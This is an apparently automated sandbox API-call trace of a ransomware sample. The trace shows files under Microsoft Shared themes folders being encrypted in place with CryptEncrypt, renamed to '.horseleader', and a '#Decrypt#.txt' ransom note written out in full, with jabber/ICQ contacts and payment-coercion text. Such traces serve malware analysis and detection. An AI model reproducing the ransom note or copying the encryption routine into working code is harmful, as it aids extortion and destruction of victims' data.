lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.592] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1ba7, lpOverlapped=0x0) returned 1 [0247.592] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe459, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1ba7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1ba7, lpOverlapped=0x0) returned 1 [0247.592] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.593] CloseHandle (hObject=0x1a4) returned 1 [0247.593] GetProcessHeap () returned 0x780000 [0247.593] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.593] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM.horseleader") returned 85 [0247.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm.horseleader")) returned 1 [0247.596] GetProcessHeap () returned 0x780000 [0247.596] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.596] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="QUAD.INF", cAlternateFileName="")) returned 1 [0247.596] lstrcmpiW (lpString1="QUAD.INF", lpString2="Windows") returned -1 [0247.596] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF") returned 73 [0247.596] StrStrIW (lpFirst="QUAD.INF", lpSrch=".horseleader") returned 0x0 [0247.596] lstrcmpW (lpString1="QUAD.INF", lpString2="#Decrypt#.txt") returned 1 [0247.597] lstrcmpW (lpString1="QUAD.INF", lpString2="_uninstalling_.png") returned 1 [0247.597] lstrlenW (lpString=".testttjffg") returned 11 [0247.597] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF", lpSrch=".testttjffg") returned 0x0 [0247.597] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.597] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.597] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.599] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF") returned 73 [0247.599] StrStrW (lpFirst="QUAD.INF", lpSrch=".txt") returned 0x0 [0247.599] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=600) returned 1 [0247.599] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x258, lpOverlapped=0x0) returned 1 [0247.600] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffda8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.600] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x258, lpOverlapped=0x0) returned 1 [0247.600] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.601] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.601] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.601] CloseHandle (hObject=0x1a4) returned 1 [0247.601] GetProcessHeap () returned 0x780000 [0247.601] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.601] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF.horseleader") returned 85 [0247.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.inf.horseleader")) returned 1 [0247.602] GetProcessHeap () returned 0x780000 [0247.602] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.602] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x90f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.602] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.602] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 77 [0247.602] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.602] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.602] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.603] lstrlenW (lpString=".testttjffg") returned 11 [0247.603] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.603] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.603] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.603] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 77 [0247.604] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.604] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=37112) returned 1 [0247.604] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.610] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.611] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x40f8, 
lpOverlapped=0x0) returned 1 [0247.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbf08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x40f8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x40f8, lpOverlapped=0x0) returned 1 [0247.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.612] CloseHandle (hObject=0x1a4) returned 1 [0247.612] GetProcessHeap () returned 0x780000 [0247.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.612] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.horseleader") returned 89 [0247.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.horseleader")) returned 1 [0247.613] GetProcessHeap () returned 0x780000 [0247.613] HeapFree (in: hHeap=0x780000, 
dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.613] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x90f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.613] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.613] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\#Decrypt#.txt") returned 78 [0247.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.614] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.614] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.616] lstrlenA (lpString="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") returned 1368 [0247.616] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.616] CloseHandle (hObject=0x158) returned 1 [0247.616] GetProcessHeap () returned 0x780000 [0247.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.616] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0247.616] lstrcmpiW (lpString1="RADIAL", lpString2="Windows") returned -1 [0247.616] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned 66 [0247.616] lstrcmpW (lpString1="RADIAL", lpString2=".") returned 1 [0247.616] lstrcmpW (lpString1="RADIAL", lpString2="..") returned 1 [0247.616] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.616] GetProcessHeap () returned 0x780000 [0247.616] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.617] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*") returned 68 [0247.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.618] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\.") returned 68 [0247.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.618] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.618] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.618] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\..") returned 69 [0247.619] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.619] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x682, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.619] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.619] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 78 [0247.619] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.619] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.619] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.619] lstrlenW (lpString=".testttjffg") returned 11 [0247.619] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.619] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.619] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0247.621] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 78 [0247.621] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.621] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1666) returned 1 [0247.621] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x682, lpOverlapped=0x0) returned 1 [0247.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff97e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.623] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x682, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x682, lpOverlapped=0x0) returned 1 [0247.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.624] CloseHandle (hObject=0x1a4) returned 1 [0247.624] GetProcessHeap () returned 0x780000 [0247.624] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.624] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.horseleader") returned 90 
[0247.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.horseleader")) returned 1 [0247.625] GetProcessHeap () returned 0x780000 [0247.625] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.625] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c679700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a829930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c679700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xb75e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RADIAL.ELM", cAlternateFileName="")) returned 1 [0247.625] lstrcmpiW (lpString1="RADIAL.ELM", lpString2="Windows") returned -1 [0247.625] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM") returned 77 [0247.625] StrStrIW (lpFirst="RADIAL.ELM", lpSrch=".horseleader") returned 0x0 [0247.625] lstrcmpW (lpString1="RADIAL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.626] lstrcmpW (lpString1="RADIAL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.626] lstrlenW (lpString=".testttjffg") returned 11 [0247.626] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.626] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 
